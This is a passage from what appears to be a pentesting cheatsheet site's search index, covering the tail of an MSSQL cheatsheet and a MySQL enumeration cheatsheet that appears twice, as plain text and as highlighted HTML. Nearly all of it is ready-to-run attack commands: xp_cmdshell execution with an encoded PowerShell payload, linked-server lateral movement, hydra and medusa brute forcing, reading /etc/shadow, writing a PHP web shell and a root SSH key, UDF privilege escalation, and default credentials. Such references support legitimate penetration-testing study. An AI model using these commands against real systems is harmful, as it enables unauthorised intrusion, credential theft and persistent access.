style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e xp_cmdshell \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e xp_cmdshell \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;net user\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e xp_cmdshell \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;powershell -enc \u0026lt;base64payload\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"linked-servers-lateral-movement\"\u003eLinked Servers (Lateral Movement)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Enumerate linked servers\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.servers;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e sp_linkedservers;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Execute query on linked server\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXECUTE\u003c/span\u003e(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SELECT @@version\u0026#39;\u003c/span\u003e) \u003cspan style=\"color:#66d9ef\"\u003eAT\u003c/span\u003e [\u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003elinked_server\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e];\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXECUTE\u003c/span\u003e(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SELECT system_user\u0026#39;\u003c/span\u003e) \u003cspan style=\"color:#66d9ef\"\u003eAT\u003c/span\u003e [\u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003elinked_server\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e];\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Execute OS command via linked server\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXECUTE\u003c/span\u003e(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;EXEC xp_cmdshell \u0026#39;\u0026#39;whoami\u0026#39;\u0026#39;\u0026#39;\u003c/span\u003e) \u003cspan style=\"color:#66d9ef\"\u003eAT\u003c/span\u003e [\u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003elinked_server\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e];\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l sa -P wordlist.txt mssql://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -h \u0026lt;ip\u0026gt; -u sa -P wordlist.txt -M mssql\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec mssql \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"file-read--write\"\u003eFile Read / Write\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Read file (via BULK INSERT or OPENROWSET)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e OPENROWSET(BULK \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;C:\\Windows\\win.ini\u0026#39;\u003c/span\u003e, SINGLE_CLOB) \u003cspan style=\"color:#66d9ef\"\u003eAS\u003c/span\u003e t;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Write file (via xp_cmdshell)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e xp_cmdshell \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;echo hacked \u0026gt; C:\\inetpub\\wwwroot\\shell.txt\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"MSSQL"},{"content":"MySQL Enumeration Cheatsheet Default Port: 3306 (TCP)\nConnection \u0026amp; Banner Grabbing nc -nv \u0026lt;ip\u0026gt; 3306 # Banner grab mysql -u root -h \u0026lt;ip\u0026gt; # No password mysql -u root -p -h \u0026lt;ip\u0026gt; # Prompt for password mysql -u root -p\u0026lt;password\u0026gt; -h \u0026lt;ip\u0026gt; # Inline password (no space) mysql -u root -h \u0026lt;ip\u0026gt; -e \u0026#34;SELECT version();\u0026#34; # One-liner query Nmap Scripts nmap -p 3306 --script mysql-info \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-databases \\ --script-args mysqluser=root,mysqlpass=\u0026#39;\u0026#39; \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-empty-password \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-brute \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-audit \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-vuln-cve2012-2122 \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-* \u0026lt;ip\u0026gt; # All MySQL scripts Enumeration Queries -- Version and environment SELECT version(); SELECT @@version; SELECT user(); SELECT @@datadir; SELECT @@basedir; SELECT @@hostname; -- Databases and tables SHOW databases; USE \u0026lt;database\u0026gt;; SHOW tables; DESCRIBE \u0026lt;table\u0026gt;; SELECT * FROM \u0026lt;table\u0026gt; LIMIT 5; SELECT table_schema, table_name FROM information_schema.tables; -- Users and privileges SELECT user, host, authentication_string FROM mysql.user; SELECT user, host, password FROM mysql.user; -- older MySQL SELECT * FROM information_schema.user_privileges; SHOW GRANTS FOR \u0026#39;\u0026lt;user\u0026gt;\u0026#39;@\u0026#39;\u0026lt;host\u0026gt;\u0026#39;; SHOW GRANTS FOR CURRENT_USER(); -- Check FILE privilege SELECT user, host, File_priv FROM mysql.user; File Read / Write (Requires FILE Privilege) -- Read files SELECT LOAD_FILE(\u0026#39;/etc/passwd\u0026#39;); SELECT LOAD_FILE(\u0026#39;/etc/shadow\u0026#39;); SELECT LOAD_FILE(\u0026#39;C:/Windows/System32/drivers/etc/hosts\u0026#39;); -- Write files (web shell) SELECT \u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; INTO OUTFILE \u0026#39;/var/www/html/shell.php\u0026#39;; -- Write SSH key SELECT \u0026#39;ssh-rsa AAAA...\u0026#39; INTO OUTFILE \u0026#39;/root/.ssh/authorized_keys\u0026#39;; Brute Force hydra -l root -P wordlist.txt mysql://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt mysql://\u0026lt;ip\u0026gt; medusa -h \u0026lt;ip\u0026gt; -u root -P wordlist.txt -M mysql User-Defined Functions (UDF) for Privilege Escalation -- Check if plugin dir is writable (post-login) SHOW variables LIKE \u0026#39;plugin_dir\u0026#39;; -- Drop malicious UDF .so/.dll into plugin dir, -- then create the function and execute OS commands CREATE FUNCTION sys_exec RETURNS INT SONAME \u0026#39;lib_mysqludf_sys.so\u0026#39;; SELECT sys_exec(\u0026#39;id \u0026gt; /tmp/out\u0026#39;); Common Credentials to Try root : (blank) root : root root : password root : mysql root : toor admin : admin ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/mysql/","summary":"\u003ch1 id=\"mysql-enumeration-cheatsheet\"\u003eMySQL Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 3306 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"connection--banner-grabbing\"\u003eConnection \u0026amp; Banner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -h \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# No password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -p -h \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Prompt for password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -p\u0026lt;password\u0026gt; -h \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Inline password (no space)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -h \u0026lt;ip\u0026gt; -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT version();\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# One-liner query\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-databases \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args mysqluser\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eroot,mysqlpass\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-empty-password \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-audit \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-vuln-cve2012-2122 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All MySQL scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enumeration-queries\"\u003eEnumeration Queries\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Version and environment\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eversion\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003eversion\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003edatadir;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003ebasedir;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003ehostname;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Databases and tables\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e databases;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eUSE \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003edatabase\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eDESCRIBE\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003etable\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003etable\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eLIMIT\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e5\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e table_schema, \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e information_schema.tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Users and privileges\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, authentication_string \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, password \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e; \u003cspan style=\"color:#75715e\"\u003e-- older MySQL\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e information_schema.user_privileges;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e GRANTS \u003cspan style=\"color:#66d9ef\"\u003eFOR\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;user\u0026gt;\u0026#39;\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e@\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;host\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e GRANTS \u003cspan style=\"color:#66d9ef\"\u003eFOR\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eCURRENT_USER\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check FILE privilege\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, File_priv \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"file-read--write-requires-file-privilege\"\u003eFile Read / Write (Requires FILE Privilege)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Read files\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/etc/passwd\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/etc/shadow\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;C:/Windows/System32/drivers/etc/hosts\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Write files (web shell)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eINTO\u003c/span\u003e OUTFILE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/var/www/html/shell.php\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Write SSH key\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;ssh-rsa AAAA...\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eINTO\u003c/span\u003e OUTFILE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/root/.ssh/authorized_keys\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l root -P wordlist.txt mysql://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt mysql://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -h \u0026lt;ip\u0026gt; -u root -P wordlist.txt -M mysql\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-defined-functions-udf-for-privilege-escalation\"\u003eUser-Defined Functions (UDF) for Privilege Escalation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check if plugin dir is writable (post-login)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e variables \u003cspan style=\"color:#66d9ef\"\u003eLIKE\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;plugin_dir\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Drop malicious UDF .so/.dll into plugin dir,\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- then create the function and execute OS commands\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eCREATE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFUNCTION\u003c/span\u003e sys_exec \u003cspan style=\"color:#66d9ef\"\u003eRETURNS\u003c/span\u003e INT SONAME \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;lib_mysqludf_sys.so\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e 